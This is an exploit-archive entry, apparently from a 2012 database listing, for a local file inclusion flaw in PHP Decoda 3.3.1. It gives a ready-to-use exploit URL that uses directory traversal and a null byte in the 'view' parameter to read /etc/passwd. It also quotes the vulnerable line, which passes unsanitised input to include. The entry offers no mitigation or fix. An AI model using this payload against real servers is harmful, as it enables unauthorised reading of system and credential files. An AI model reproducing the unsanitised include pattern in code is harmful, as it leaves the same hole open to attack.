[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : PHP Decoda 3.3.1 Local File Inclusion
# Published : 2012-06-16
# Author :
# Previous Title : Lc Flickr Carousel V1.0 => Local File Disclosure Vulnerability
# Next Title : Event Script PHP v1.1 CMS Multiple Vulnerabilities
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Exploit Title: [php-decoda local file inclusion ]
# Date: [16/06/2012]
# Author: [Number 7]
# Software Link: [http://milesj.me/code/php/decoda]
# Version: [3.3.1]
# Tested on: [linux]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Exp:
http://localhost/milesj-php-decoda/index.php?view=../../../../../../../etc/passwd%00
~~Line 111 in Index.php:
<?php include $view .'.php'; ?>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Blogpot: [http://TunisianSeven.blogspot.com/]
Twitter: [@TunisianSeven]